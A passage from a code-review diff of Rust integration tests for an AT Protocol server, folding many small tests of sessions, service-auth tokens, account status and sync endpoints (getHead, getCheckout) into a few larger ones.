invalid).is_empty()); 168 } 169 170 #[tokio::test] 171 + async fn test_signup_queue_authentication() { 172 use common::{base_url, client, create_account_and_login}; 173 let base = base_url().await; 174 let http_client = client(); 175 + 176 + let res = http_client.get(format!("{}/xrpc/com.atproto.temp.checkSignupQueue", base)) 177 + .send().await.unwrap(); 178 + assert_eq!(res.status(), reqwest::StatusCode::OK); 179 let body: serde_json::Value = res.json().await.unwrap(); 180 assert_eq!(body["activated"], true); 181 182 + let (token, _did) = create_account_and_login(&http_client).await; 183 + let res = http_client.get(format!("{}/xrpc/com.atproto.temp.checkSignupQueue", base)) 184 + .header("Authorization", format!("Bearer {}", token)) 185 + .send().await.unwrap(); 186 + assert_eq!(res.status(), reqwest::StatusCode::OK); 187 let body: serde_json::Value = res.json().await.unwrap(); 188 assert_eq!(body["activated"], true); 189 }
+80 -346
tests/server.rs
··· 6 use serde_json::{Value, json}; 7 8 #[tokio::test] 9 - async fn test_health() { 10 let client = client(); 11 - let res = client 12 - .get(format!("{}/health", base_url().await)) 13 - .send() 14 - .await 15 - .expect("Failed to send request"); 16 - assert_eq!(res.status(), StatusCode::OK); 17 - assert_eq!(res.text().await.unwrap(), "OK"); 18 - } 19 - 20 - #[tokio::test] 21 - async fn test_describe_server() { 22 - let client = client(); 23 - let res = client 24 - .get(format!( 25 - "{}/xrpc/com.atproto.server.describeServer", 26 - base_url().await 27 - )) 28 - .send() 29 - .await 30 - .expect("Failed to send request"); 31 - assert_eq!(res.status(), StatusCode::OK); 32 - let body: Value = res.json().await.expect("Response was not valid JSON"); 33 assert!(body.get("availableUserDomains").is_some()); 34 } 35 36 #[tokio::test] 37 - async fn test_create_session() { 38 let client = client(); 39 let handle = format!("user_{}", uuid::Uuid::new_v4()); 40 - let payload = json!({ 41 - "handle": handle, 42 - "email": format!("{}@example.com", handle), 43 - "password": "password" 44 - }); 45 - let create_res = client 46 - .post(format!( 47 - "{}/xrpc/com.atproto.server.createAccount", 48 - base_url().await 49 - )) 50 - .json(&payload) 51 - .send() 52 - .await 53 - .expect("Failed to create account"); 54 assert_eq!(create_res.status(), StatusCode::OK); 55 let create_body: Value = create_res.json().await.unwrap(); 56 let did = create_body["did"].as_str().unwrap(); 57 let _ = verify_new_account(&client, did).await; 58 - let payload = json!({ 59 - "identifier": handle, 60 - "password": "password" 61 - }); 62 - let res = client 63 - .post(format!( 64 - "{}/xrpc/com.atproto.server.createSession", 65 - base_url().await 66 - )) 67 - .json(&payload) 68 - .send() 69 - .await 70 - .expect("Failed to send request"); 71 - assert_eq!(res.status(), StatusCode::OK); 72 - let body: Value = res.json().await.expect("Response was not valid JSON"); 73 - assert!(body.get("accessJwt").is_some()); 74 - } 75 - 76 - #[tokio::test] 77 - async fn test_create_session_missing_identifier() { 78 - let client = client(); 79 - let payload = json!({ 80 - "password": "password" 81 - }); 82 - let res = client 83 - .post(format!( 84 - "{}/xrpc/com.atproto.server.createSession", 85 - base_url().await 86 - )) 87 - .json(&payload) 88 - .send() 89 - .await 90 - .expect("Failed to send request"); 91 - assert!( 92 - res.status() == StatusCode::BAD_REQUEST || res.status() == StatusCode::UNPROCESSABLE_ENTITY, 93 - "Expected 400 or 422 for missing identifier, got {}", 94 - res.status() 95 - ); 96 - } 97 - 98 - #[tokio::test] 99 - async fn test_create_account_invalid_handle() { 100 - let client = client(); 101 - let payload = json!({ 102 - "handle": "invalid!handle.com", 103 - "email": "test@example.com", 104 - "password": "password" 105 - }); 106 - let res = client 107 - .post(format!( 108 - "{}/xrpc/com.atproto.server.createAccount", 109 - base_url().await 110 - )) 111 - .json(&payload) 112 - .send() 113 - .await 114 - .expect("Failed to send request"); 115 - assert_eq!( 116 - res.status(), 117 - StatusCode::BAD_REQUEST, 118 - "Expected 400 for invalid handle chars" 119 - ); 120 - } 121 - 122 - #[tokio::test] 123 - async fn test_get_session() { 124 - let client = client(); 125 - let res = client 126 - .get(format!( 127 - "{}/xrpc/com.atproto.server.getSession", 128 - base_url().await 129 - )) 130 - .bearer_auth(AUTH_TOKEN) 131 - .send() 132 - .await 133 - .expect("Failed to send request"); 134 - assert_eq!(res.status(), StatusCode::UNAUTHORIZED); 135 - } 136 - 137 - #[tokio::test] 138 - async fn test_refresh_session() { 139 - let client = client(); 140 - let handle = format!("refresh_user_{}", uuid::Uuid::new_v4()); 141 - let payload = json!({ 142 - "handle": handle, 143 - "email": format!("{}@example.com", handle), 144 - "password": "password" 145 - }); 146 - let create_res = client 147 - .post(format!( 148 - "{}/xrpc/com.atproto.server.createAccount", 149 - base_url().await 150 - )) 151 - .json(&payload) 152 - .send() 153 - .await 154 - .expect("Failed to create account"); 155 - assert_eq!(create_res.status(), StatusCode::OK); 156 - let create_body: Value = create_res.json().await.unwrap(); 157 - let did = create_body["did"].as_str().unwrap(); 158 - let _ = verify_new_account(&client, did).await; 159 - let login_payload = json!({ 160 - "identifier": handle, 161 - "password": "password" 162 - }); 163 - let res = client 164 - .post(format!( 165 - "{}/xrpc/com.atproto.server.createSession", 166 - base_url().await 167 - )) 168 - .json(&login_payload) 169 - .send() 170 - .await 171 - .expect("Failed to login"); 172 - assert_eq!(res.status(), StatusCode::OK); 173 - let body: Value = res.json().await.expect("Invalid JSON"); 174 - let refresh_jwt = body["refreshJwt"] 175 - .as_str() 176 - .expect("No refreshJwt") 177 - .to_string(); 178 - let access_jwt = body["accessJwt"] 179 - .as_str() 180 - .expect("No accessJwt") 181 - .to_string(); 182 - let res = client 183 - .post(format!( 184 - "{}/xrpc/com.atproto.server.refreshSession", 185 - base_url().await 186 - )) 187 - .bearer_auth(&refresh_jwt) 188 - .send() 189 - .await 190 - .expect("Failed to refresh"); 191 - assert_eq!(res.status(), StatusCode::OK); 192 - let body: Value = res.json().await.expect("Invalid JSON"); 193 - assert!(body["accessJwt"].as_str().is_some()); 194 - assert!(body["refreshJwt"].as_str().is_some()); 195 - assert_ne!(body["accessJwt"].as_str().unwrap(), access_jwt); 196 - assert_ne!(body["refreshJwt"].as_str().unwrap(), refresh_jwt); 197 - } 198 - 199 - #[tokio::test] 200 - async fn test_delete_session() { 201 - let client = client(); 202 - let res = client 203 - .post(format!( 204 - "{}/xrpc/com.atproto.server.deleteSession", 205 - base_url().await 206 - )) 207 - .bearer_auth(AUTH_TOKEN) 208 - .send() 209 - .await 210 - .expect("Failed to send request"); 211 - assert_eq!(res.status(), StatusCode::UNAUTHORIZED); 212 } 213 214 #[tokio::test] 215 - async fn test_get_service_auth_success() { 216 let client = client(); 217 let (access_jwt, did) = create_account_and_login(&client).await; 218 - let params = [("aud", "did:web:example.com")]; 219 - let res = client 220 - .get(format!( 221 - "{}/xrpc/com.atproto.server.getServiceAuth", 222 - base_url().await 223 - )) 224 - .bearer_auth(&access_jwt) 225 - .query(&params) 226 - .send() 227 - .await 228 - .expect("Failed to send request"); 229 assert_eq!(res.status(), StatusCode::OK); 230 - let body: Value = res.json().await.expect("Response was not valid JSON"); 231 - assert!(body["token"].is_string()); 232 let token = body["token"].as_str().unwrap(); 233 let parts: Vec<&str> = token.split('.').collect(); 234 assert_eq!(parts.len(), 3, "Token should be a valid JWT"); 235 use base64::{Engine as _, engine::general_purpose::URL_SAFE_NO_PAD}; 236 - let payload_bytes = URL_SAFE_NO_PAD.decode(parts[1]).expect("payload b64"); 237 - let claims: Value = serde_json::from_slice(&payload_bytes).expect("payload json"); 238 assert_eq!(claims["iss"], did); 239 assert_eq!(claims["sub"], did); 240 assert_eq!(claims["aud"], "did:web:example.com"); 241 } 242 243 #[tokio::test] 244 - async fn test_get_service_auth_with_lxm() { 245 let client = client(); 246 - let (access_jwt, did) = create_account_and_login(&client).await; 247 - let params = [ 248 - ("aud", "did:web:example.com"), 249 - ("lxm", "com.atproto.repo.getRecord"), 250 - ]; 251 - let res = client 252 - .get(format!( 253 - "{}/xrpc/com.atproto.server.getServiceAuth", 254 - base_url().await 255 - )) 256 - .bearer_auth(&access_jwt) 257 - .query(&params) 258 - .send() 259 - .await 260 - .expect("Failed to send request"); 261 - assert_eq!(res.status(), StatusCode::OK); 262 - let body: Value = res.json().await.expect("Response was not valid JSON"); 263 - use base64::{Engine as _, engine::general_purpose::URL_SAFE_NO_PAD}; 264 - let token = body["token"].as_str().unwrap(); 265 - let parts: Vec<&str> = token.split('.').collect(); 266 - let payload_bytes = URL_SAFE_NO_PAD.decode(parts[1]).expect("payload b64"); 267 - let claims: Value = serde_json::from_slice(&payload_bytes).expect("payload json"); 268 - assert_eq!(claims["iss"], did); 269 - assert_eq!(claims["lxm"], "com.atproto.repo.getRecord"); 270 - } 271 - 272 - #[tokio::test] 273 - async fn test_get_service_auth_no_auth() { 274 - let client = client(); 275 - let params = [("aud", "did:web:example.com")]; 276 - let res = client 277 - .get(format!( 278 - "{}/xrpc/com.atproto.server.getServiceAuth", 279 - base_url().await 280 - )) 281 - .query(&params) 282 - .send() 283 - .await 284 - .expect("Failed to send request"); 285 - assert_eq!(res.status(), StatusCode::UNAUTHORIZED); 286 - let body: Value = res.json().await.expect("Response was not valid JSON"); 287 - assert_eq!(body["error"], "AuthenticationRequired"); 288 - } 289 - 290 - #[tokio::test] 291 - async fn test_get_service_auth_missing_aud() { 292 - let client = client(); 293 let (access_jwt, _) = create_account_and_login(&client).await; 294 - let res = client 295 - .get(format!( 296 - "{}/xrpc/com.atproto.server.getServiceAuth", 297 - base_url().await 298 - )) 299 - .bearer_auth(&access_jwt) 300 - .send() 301 - .await 302 - .expect("Failed to send request"); 303 - assert_eq!(res.status(), StatusCode::BAD_REQUEST); 304 - } 305 - 306 - #[tokio::test] 307 - async fn test_check_account_status_success() { 308 - let client = client(); 309 - let (access_jwt, _) = create_account_and_login(&client).await; 310 - let res = client 311 - .get(format!( 312 - "{}/xrpc/com.atproto.server.checkAccountStatus", 313 - base_url().await 314 - )) 315 - .bearer_auth(&access_jwt) 316 - .send() 317 - .await 318 - .expect("Failed to send request"); 319 - assert_eq!(res.status(), StatusCode::OK); 320 - let body: Value = res.json().await.expect("Response was not valid JSON"); 321 assert_eq!(body["activated"], true); 322 assert_eq!(body["validDid"], true); 323 assert!(body["repoCommit"].is_string()); 324 assert!(body["repoRev"].is_string()); 325 assert!(body["indexedRecords"].is_number()); 326 - } 327 - 328 - #[tokio::test] 329 - async fn test_check_account_status_no_auth() { 330 - let client = client(); 331 - let res = client 332 - .get(format!( 333 - "{}/xrpc/com.atproto.server.checkAccountStatus", 334 - base_url().await 335 - )) 336 - .send() 337 - .await 338 - .expect("Failed to send request"); 339 - assert_eq!(res.status(), StatusCode::UNAUTHORIZED); 340 - let body: Value = res.json().await.expect("Response was not valid JSON"); 341 - assert_eq!(body["error"], "AuthenticationRequired"); 342 - } 343 - 344 - #[tokio::test] 345 - async fn test_activate_account_success() { 346 - let client = client(); 347 - let (access_jwt, _) = create_account_and_login(&client).await; 348 - let res = client 349 - .post(format!( 350 - "{}/xrpc/com.atproto.server.activateAccount", 351 - base_url().await 352 - )) 353 - .bearer_auth(&access_jwt) 354 - .send() 355 - .await 356 - .expect("Failed to send request"); 357 - assert_eq!(res.status(), StatusCode::OK); 358 - } 359 - 360 - #[tokio::test] 361 - async fn test_activate_account_no_auth() { 362 - let client = client(); 363 - let res = client 364 - .post(format!( 365 - "{}/xrpc/com.atproto.server.activateAccount", 366 - base_url().await 367 - )) 368 - .send() 369 - .await 370 - .expect("Failed to send request"); 371 - assert_eq!(res.status(), StatusCode::UNAUTHORIZED); 372 - } 373 - 374 - #[tokio::test] 375 - async fn test_deactivate_account_success() { 376 - let client = client(); 377 - let (access_jwt, _) = create_account_and_login(&client).await; 378 - let res = client 379 - .post(format!( 380 - "{}/xrpc/com.atproto.server.deactivateAccount", 381 - base_url().await 382 - )) 383 - .bearer_auth(&access_jwt) 384 - .json(&json!({})) 385 - .send() 386 - .await 387 - .expect("Failed to send request"); 388 - assert_eq!(res.status(), StatusCode::OK); 389 }
··· 6 use serde_json::{Value, json}; 7 8 #[tokio::test] 9 + async fn test_server_basics() { 10 let client = client(); 11 + let base = base_url().await; 12 + let health = client.get(format!("{}/health", base)).send().await.unwrap(); 13 + assert_eq!(health.status(), StatusCode::OK); 14 + assert_eq!(health.text().await.unwrap(), "OK"); 15 + let describe = client.get(format!("{}/xrpc/com.atproto.server.describeServer", base)).send().await.unwrap(); 16 + assert_eq!(describe.status(), StatusCode::OK); 17 + let body: Value = describe.json().await.unwrap(); 18 assert!(body.get("availableUserDomains").is_some()); 19 } 20 21 #[tokio::test] 22 + async fn test_account_and_session_lifecycle() { 23 let client = client(); 24 + let base = base_url().await; 25 let handle = format!("user_{}", uuid::Uuid::new_v4()); 26 + let payload = json!({ "handle": handle, "email": format!("{}@example.com", handle), "password": "password" }); 27 + let create_res = client.post(format!("{}/xrpc/com.atproto.server.createAccount", base)) 28 + .json(&payload).send().await.unwrap(); 29 assert_eq!(create_res.status(), StatusCode::OK); 30 let create_body: Value = create_res.json().await.unwrap(); 31 let did = create_body["did"].as_str().unwrap(); 32 let _ = verify_new_account(&client, did).await; 33 + let login = client.post(format!("{}/xrpc/com.atproto.server.createSession", base)) 34 + .json(&json!({ "identifier": handle, "password": "password" })).send().await.unwrap(); 35 + assert_eq!(login.status(), StatusCode::OK); 36 + let login_body: Value = login.json().await.unwrap(); 37 + let access_jwt = login_body["accessJwt"].as_str().unwrap().to_string(); 38 + let refresh_jwt = login_body["refreshJwt"].as_str().unwrap().to_string(); 39 + let refresh = client.post(format!("{}/xrpc/com.atproto.server.refreshSession", base)) 40 + .bearer_auth(&refresh_jwt).send().await.unwrap(); 41 + assert_eq!(refresh.status(), StatusCode::OK); 42 + let refresh_body: Value = refresh.json().await.unwrap(); 43 + assert!(refresh_body["accessJwt"].as_str().is_some()); 44 + assert_ne!(refresh_body["accessJwt"].as_str().unwrap(), access_jwt); 45 + assert_ne!(refresh_body["refreshJwt"].as_str().unwrap(), refresh_jwt); 46 + let missing_id = client.post(format!("{}/xrpc/com.atproto.server.createSession", base)) 47 + .json(&json!({ "password": "password" })).send().await.unwrap(); 48 + assert!(missing_id.status() == StatusCode::BAD_REQUEST || missing_id.status() == StatusCode::UNPROCESSABLE_ENTITY); 49 + let invalid_handle = client.post(format!("{}/xrpc/com.atproto.server.createAccount", base)) 50 + .json(&json!({ "handle": "invalid!handle.com", "email": "test@example.com", "password": "password" })) 51 + .send().await.unwrap(); 52 + assert_eq!(invalid_handle.status(), StatusCode::BAD_REQUEST); 53 + let unauth_session = client.get(format!("{}/xrpc/com.atproto.server.getSession", base)) 54 + .bearer_auth(AUTH_TOKEN).send().await.unwrap(); 55 + assert_eq!(unauth_session.status(), StatusCode::UNAUTHORIZED); 56 + let delete_session = client.post(format!("{}/xrpc/com.atproto.server.deleteSession", base)) 57 + .bearer_auth(AUTH_TOKEN).send().await.unwrap(); 58 + assert_eq!(delete_session.status(), StatusCode::UNAUTHORIZED); 59 } 60 61 #[tokio::test] 62 + async fn test_service_auth() { 63 let client = client(); 64 + let base = base_url().await; 65 let (access_jwt, did) = create_account_and_login(&client).await; 66 + let res = client.get(format!("{}/xrpc/com.atproto.server.getServiceAuth", base)) 67 + .bearer_auth(&access_jwt).query(&[("aud", "did:web:example.com")]).send().await.unwrap(); 68 assert_eq!(res.status(), StatusCode::OK); 69 + let body: Value = res.json().await.unwrap(); 70 let token = body["token"].as_str().unwrap(); 71 let parts: Vec<&str> = token.split('.').collect(); 72 assert_eq!(parts.len(), 3, "Token should be a valid JWT"); 73 use base64::{Engine as _, engine::general_purpose::URL_SAFE_NO_PAD}; 74 + let payload_bytes = URL_SAFE_NO_PAD.decode(parts[1]).unwrap(); 75 + let claims: Value = serde_json::from_slice(&payload_bytes).unwrap(); 76 assert_eq!(claims["iss"], did); 77 assert_eq!(claims["sub"], did); 78 assert_eq!(claims["aud"], "did:web:example.com"); 79 + let lxm_res = client.get(format!("{}/xrpc/com.atproto.server.getServiceAuth", base)) 80 + .bearer_auth(&access_jwt).query(&[("aud", "did:web:example.com"), ("lxm", "com.atproto.repo.getRecord")]) 81 + .send().await.unwrap(); 82 + assert_eq!(lxm_res.status(), StatusCode::OK); 83 + let lxm_body: Value = lxm_res.json().await.unwrap(); 84 + let lxm_token = lxm_body["token"].as_str().unwrap(); 85 + let lxm_parts: Vec<&str> = lxm_token.split('.').collect(); 86 + let lxm_payload = URL_SAFE_NO_PAD.decode(lxm_parts[1]).unwrap(); 87 + let lxm_claims: Value = serde_json::from_slice(&lxm_payload).unwrap(); 88 + assert_eq!(lxm_claims["lxm"], "com.atproto.repo.getRecord"); 89 + let unauth = client.get(format!("{}/xrpc/com.atproto.server.getServiceAuth", base)) 90 + .query(&[("aud", "did:web:example.com")]).send().await.unwrap(); 91 + assert_eq!(unauth.status(), StatusCode::UNAUTHORIZED); 92 + let missing_aud = client.get(format!("{}/xrpc/com.atproto.server.getServiceAuth", base)) 93 + .bearer_auth(&access_jwt).send().await.unwrap(); 94 + assert_eq!(missing_aud.status(), StatusCode::BAD_REQUEST); 95 } 96 97 #[tokio::test] 98 + async fn test_account_status_and_activation() { 99 let client = client(); 100 + let base = base_url().await; 101 let (access_jwt, _) = create_account_and_login(&client).await; 102 + let status = client.get(format!("{}/xrpc/com.atproto.server.checkAccountStatus", base)) 103 + .bearer_auth(&access_jwt).send().await.unwrap(); 104 + assert_eq!(status.status(), StatusCode::OK); 105 + let body: Value = status.json().await.unwrap(); 106 assert_eq!(body["activated"], true); 107 assert_eq!(body["validDid"], true); 108 assert!(body["repoCommit"].is_string()); 109 assert!(body["repoRev"].is_string()); 110 assert!(body["indexedRecords"].is_number()); 111 + let unauth_status = client.get(format!("{}/xrpc/com.atproto.server.checkAccountStatus", base)) 112 + .send().await.unwrap(); 113 + assert_eq!(unauth_status.status(), StatusCode::UNAUTHORIZED); 114 + let activate = client.post(format!("{}/xrpc/com.atproto.server.activateAccount", base)) 115 + .bearer_auth(&access_jwt).send().await.unwrap(); 116 + assert_eq!(activate.status(), StatusCode::OK); 117 + let unauth_activate = client.post(format!("{}/xrpc/com.atproto.server.activateAccount", base)) 118 + .send().await.unwrap(); 119 + assert_eq!(unauth_activate.status(), StatusCode::UNAUTHORIZED); 120 + let deactivate = client.post(format!("{}/xrpc/com.atproto.server.deactivateAccount", base)) 121 + .bearer_auth(&access_jwt).json(&json!({})).send().await.unwrap(); 122 + assert_eq!(deactivate.status(), StatusCode::OK); 123 }
+73 -255
tests/sync_deprecated.rs
··· 6 use serde_json::Value; 7 8 #[tokio::test] 9 - async fn test_get_head_success() { 10 let client = client(); 11 - let (did, _jwt) = setup_new_user("gethead-success").await; 12 let res = client 13 - .get(format!( 14 - "{}/xrpc/com.atproto.sync.getHead", 15 - base_url().await 16 - )) 17 .query(&[("did", did.as_str())]) 18 - .send() 19 - .await 20 - .expect("Failed to send request"); 21 assert_eq!(res.status(), StatusCode::OK); 22 let body: Value = res.json().await.expect("Response was not valid JSON"); 23 assert!(body["root"].is_string()); 24 - let root = body["root"].as_str().unwrap(); 25 - assert!(root.starts_with("bafy"), "Root CID should be a CID"); 26 - } 27 - 28 - #[tokio::test] 29 - async fn test_get_head_not_found() { 30 - let client = client(); 31 - let res = client 32 - .get(format!( 33 - "{}/xrpc/com.atproto.sync.getHead", 34 - base_url().await 35 - )) 36 - .query(&[("did", "did:plc:nonexistent12345")]) 37 - .send() 38 - .await 39 - .expect("Failed to send request"); 40 - assert_eq!(res.status(), StatusCode::BAD_REQUEST); 41 - let body: Value = res.json().await.expect("Response was not valid JSON"); 42 - assert_eq!(body["error"], "HeadNotFound"); 43 - assert!( 44 - body["message"] 45 - .as_str() 46 - .unwrap() 47 - .contains("Could not find root") 48 - ); 49 - } 50 - 51 - #[tokio::test] 52 - async fn test_get_head_missing_param() { 53 - let client = client(); 54 - let res = client 55 - .get(format!( 56 - "{}/xrpc/com.atproto.sync.getHead", 57 - base_url().await 58 - )) 59 - .send() 60 - .await 61 - .expect("Failed to send request"); 62 - assert_eq!(res.status(), StatusCode::BAD_REQUEST); 63 - } 64 - 65 - #[tokio::test] 66 - async fn test_get_head_empty_did() { 67 - let client = client(); 68 - let res = client 69 - .get(format!( 70 - "{}/xrpc/com.atproto.sync.getHead", 71 - base_url().await 72 - )) 73 - .query(&[("did", "")]) 74 - .send() 75 - .await 76 - .expect("Failed to send request"); 77 - assert_eq!(res.status(), StatusCode::BAD_REQUEST); 78 - let body: Value = res.json().await.expect("Response was not valid JSON"); 79 - assert_eq!(body["error"], "InvalidRequest"); 80 - } 81 - 82 - #[tokio::test] 83 - async fn test_get_head_whitespace_did() { 84 - let client = client(); 85 - let res = client 86 - .get(format!( 87 - "{}/xrpc/com.atproto.sync.getHead", 88 - base_url().await 89 - )) 90 - .query(&[("did", " ")]) 91 - .send() 92 - .await 93 - .expect("Failed to send request"); 94 - assert_eq!(res.status(), StatusCode::BAD_REQUEST); 95 - } 96 - 97 - #[tokio::test] 98 - async fn test_get_head_changes_after_record_create() { 99 - let client = client(); 100 - let (did, jwt) = setup_new_user("gethead-changes").await; 101 - let res1 = client 102 - .get(format!( 103 - "{}/xrpc/com.atproto.sync.getHead", 104 - base_url().await 105 - )) 106 .query(&[("did", did.as_str())]) 107 - .send() 108 - .await 109 - .expect("Failed to get initial head"); 110 - let body1: Value = res1.json().await.unwrap(); 111 - let head1 = body1["root"].as_str().unwrap().to_string(); 112 create_post(&client, &did, &jwt, "Post to change head").await; 113 let res2 = client 114 - .get(format!( 115 - "{}/xrpc/com.atproto.sync.getHead", 116 - base_url().await 117 - )) 118 .query(&[("did", did.as_str())]) 119 - .send() 120 - .await 121 - .expect("Failed to get head after record"); 122 let body2: Value = res2.json().await.unwrap(); 123 - let head2 = body2["root"].as_str().unwrap().to_string(); 124 - assert_ne!(head1, head2, "Head CID should change after record creation"); 125 } 126 127 #[tokio::test] 128 - async fn test_get_checkout_success() { 129 let client = client(); 130 - let (did, jwt) = setup_new_user("getcheckout-success").await; 131 create_post(&client, &did, &jwt, "Post for checkout test").await; 132 let res = client 133 - .get(format!( 134 - "{}/xrpc/com.atproto.sync.getCheckout", 135 - base_url().await 136 - )) 137 .query(&[("did", did.as_str())]) 138 - .send() 139 - .await 140 - .expect("Failed to send request"); 141 assert_eq!(res.status(), StatusCode::OK); 142 - assert_eq!( 143 - res.headers() 144 - .get("content-type") 145 - .and_then(|h| h.to_str().ok()), 146 - Some("application/vnd.ipld.car") 147 - ); 148 let body = res.bytes().await.expect("Failed to get body"); 149 assert!(!body.is_empty(), "CAR file should not be empty"); 150 assert!(body.len() > 50, "CAR file should contain actual data"); 151 - } 152 - 153 - #[tokio::test] 154 - async fn test_get_checkout_not_found() { 155 - let client = client(); 156 - let res = client 157 - .get(format!( 158 - "{}/xrpc/com.atproto.sync.getCheckout", 159 - base_url().await 160 - )) 161 - .query(&[("did", "did:plc:nonexistent12345")]) 162 - .send() 163 - .await 164 - .expect("Failed to send request"); 165 - assert_eq!(res.status(), StatusCode::NOT_FOUND); 166 - let body: Value = res.json().await.expect("Response was not valid JSON"); 167 - assert_eq!(body["error"], "RepoNotFound"); 168 - } 169 - 170 - #[tokio::test] 171 - async fn test_get_checkout_missing_param() { 172 - let client = client(); 173 - let res = client 174 - .get(format!( 175 - "{}/xrpc/com.atproto.sync.getCheckout", 176 - base_url().await 177 - )) 178 - .send() 179 - .await 180 - .expect("Failed to send request"); 181 - assert_eq!(res.status(), StatusCode::BAD_REQUEST); 182 - } 183 - 184 - #[tokio::test] 185 - async fn test_get_checkout_empty_did() { 186 - let client = client(); 187 - let res = client 188 - .get(format!( 189 - "{}/xrpc/com.atproto.sync.getCheckout", 190 - base_url().await 191 - )) 192 - .query(&[("did", "")]) 193 - .send() 194 - .await 195 - .expect("Failed to send request"); 196 - assert_eq!(res.status(), StatusCode::BAD_REQUEST); 197 - } 198 - 199 - #[tokio::test] 200 - async fn test_get_checkout_empty_repo() { 201 - let client = client(); 202 - let (did, _jwt) = setup_new_user("getcheckout-empty").await; 203 - let res = client 204 - .get(format!( 205 - "{}/xrpc/com.atproto.sync.getCheckout", 206 - base_url().await 207 - )) 208 - .query(&[("did", did.as_str())]) 209 - .send() 210 - .await 211 - .expect("Failed to send request"); 212 - assert_eq!(res.status(), StatusCode::OK); 213 - let body = res.bytes().await.expect("Failed to get body"); 214 - assert!(!body.is_empty(), "Even empty repo should return CAR header"); 215 - } 216 - 217 - #[tokio::test] 218 - async fn test_get_checkout_includes_multiple_records() { 219 - let client = client(); 220 - let (did, jwt) = setup_new_user("getcheckout-multi").await; 221 - for i in 0..5 { 222 tokio::time::sleep(std::time::Duration::from_millis(50)).await; 223 create_post(&client, &did, &jwt, &format!("Checkout post {}", i)).await; 224 } 225 - let res = client 226 - .get(format!( 227 - "{}/xrpc/com.atproto.sync.getCheckout", 228 - base_url().await 229 - )) 230 - .query(&[("did", did.as_str())]) 231 - .send() 232 - .await 233 - .expect("Failed to send request"); 234 - assert_eq!(res.status(), StatusCode::OK); 235 - let body = res.bytes().await.expect("Failed to get body"); 236 - assert!(body.len() > 500, "CAR file with 5 records should be larger"); 237 - } 238 - 239 - #[tokio::test] 240 - async fn test_get_head_matches_latest_commit() { 241 - let client = client(); 242 - let (did, _jwt) = setup_new_user("gethead-matches-latest").await; 243 - let head_res = client 244 - .get(format!( 245 - "{}/xrpc/com.atproto.sync.getHead", 246 - base_url().await 247 - )) 248 - .query(&[("did", did.as_str())]) 249 - .send() 250 - .await 251 - .expect("Failed to get head"); 252 - let head_body: Value = head_res.json().await.unwrap(); 253 - let head_root = head_body["root"].as_str().unwrap(); 254 - let latest_res = client 255 - .get(format!( 256 - "{}/xrpc/com.atproto.sync.getLatestCommit", 257 - base_url().await 258 - )) 259 - .query(&[("did", did.as_str())]) 260 - .send() 261 - .await 262 - .expect("Failed to get latest commit"); 263 - let latest_body: Value = latest_res.json().await.unwrap(); 264 - let latest_cid = latest_body["cid"].as_str().unwrap(); 265 - assert_eq!( 266 - head_root, latest_cid, 267 - "getHead root should match getLatestCommit cid" 268 - ); 269 - } 270 - 271 - #[tokio::test] 272 - async fn test_get_checkout_car_header_valid() { 273 - let client = client(); 274 - let (did, _jwt) = setup_new_user("getcheckout-header").await; 275 - let res = client 276 - .get(format!( 277 - "{}/xrpc/com.atproto.sync.getCheckout", 278 - base_url().await 279 - )) 280 .query(&[("did", did.as_str())]) 281 - .send() 282 - .await 283 - .expect("Failed to send request"); 284 - assert_eq!(res.status(), StatusCode::OK); 285 - let body = res.bytes().await.expect("Failed to get body"); 286 - assert!( 287 - body.len() >= 2, 288 - "CAR file should have at least header length" 289 - ); 290 }
··· 6 use serde_json::Value; 7 8 #[tokio::test] 9 + async fn test_get_head_comprehensive() { 10 let client = client(); 11 + let (did, jwt) = setup_new_user("gethead").await; 12 let res = client 13 + .get(format!("{}/xrpc/com.atproto.sync.getHead", base_url().await)) 14 .query(&[("did", did.as_str())]) 15 + .send().await.expect("Failed to send request"); 16 assert_eq!(res.status(), StatusCode::OK); 17 let body: Value = res.json().await.expect("Response was not valid JSON"); 18 assert!(body["root"].is_string()); 19 + let root1 = body["root"].as_str().unwrap().to_string(); 20 + assert!(root1.starts_with("bafy"), "Root CID should be a CID"); 21 + let latest_res = client 22 + .get(format!("{}/xrpc/com.atproto.sync.getLatestCommit", base_url().await)) 23 .query(&[("did", did.as_str())]) 24 + .send().await.expect("Failed to get latest commit"); 25 + let latest_body: Value = latest_res.json().await.unwrap(); 26 + let latest_cid = latest_body["cid"].as_str().unwrap(); 27 + assert_eq!(root1, latest_cid, "getHead root should match getLatestCommit cid"); 28 create_post(&client, &did, &jwt, "Post to change head").await; 29 let res2 = client 30 + .get(format!("{}/xrpc/com.atproto.sync.getHead", base_url().await)) 31 .query(&[("did", did.as_str())]) 32 + .send().await.expect("Failed to get head after record"); 33 let body2: Value = res2.json().await.unwrap(); 34 + let root2 = body2["root"].as_str().unwrap().to_string(); 35 + assert_ne!(root1, root2, "Head CID should change after record creation"); 36 + let not_found_res = client 37 + .get(format!("{}/xrpc/com.atproto.sync.getHead", base_url().await)) 38 + .query(&[("did", "did:plc:nonexistent12345")]) 39 + .send().await.expect("Failed to send request"); 40 + assert_eq!(not_found_res.status(), StatusCode::BAD_REQUEST); 41 + let error_body: Value = not_found_res.json().await.unwrap(); 42 + assert_eq!(error_body["error"], "HeadNotFound"); 43 + let missing_res = client 44 + .get(format!("{}/xrpc/com.atproto.sync.getHead", base_url().await)) 45 + .send().await.expect("Failed to send request"); 46 + assert_eq!(missing_res.status(), StatusCode::BAD_REQUEST); 47 + let empty_res = client 48 + .get(format!("{}/xrpc/com.atproto.sync.getHead", base_url().await)) 49 + .query(&[("did", "")]) 50 + .send().await.expect("Failed to send request"); 51 + assert_eq!(empty_res.status(), StatusCode::BAD_REQUEST); 52 + let whitespace_res = client 53 + .get(format!("{}/xrpc/com.atproto.sync.getHead", base_url().await)) 54 + .query(&[("did", " ")]) 55 + .send().await.expect("Failed to send request"); 56 + assert_eq!(whitespace_res.status(), StatusCode::BAD_REQUEST); 57 } 58 59 #[tokio::test] 60 + async fn test_get_checkout_comprehensive() { 61 let client = client(); 62 + let (did, jwt) = setup_new_user("getcheckout").await; 63 + let empty_res = client 64 + .get(format!("{}/xrpc/com.atproto.sync.getCheckout", base_url().await)) 65 + .query(&[("did", did.as_str())]) 66 + .send().await.expect("Failed to send request"); 67 + assert_eq!(empty_res.status(), StatusCode::OK); 68 + let empty_body = empty_res.bytes().await.expect("Failed to get body"); 69 + assert!(!empty_body.is_empty(), "Even empty repo should return CAR header"); 70 create_post(&client, &did, &jwt, "Post for checkout test").await; 71 let res = client 72 + .get(format!("{}/xrpc/com.atproto.sync.getCheckout", base_url().await)) 73 .query(&[("did", did.as_str())]) 74 + .send().await.expect("Failed to send 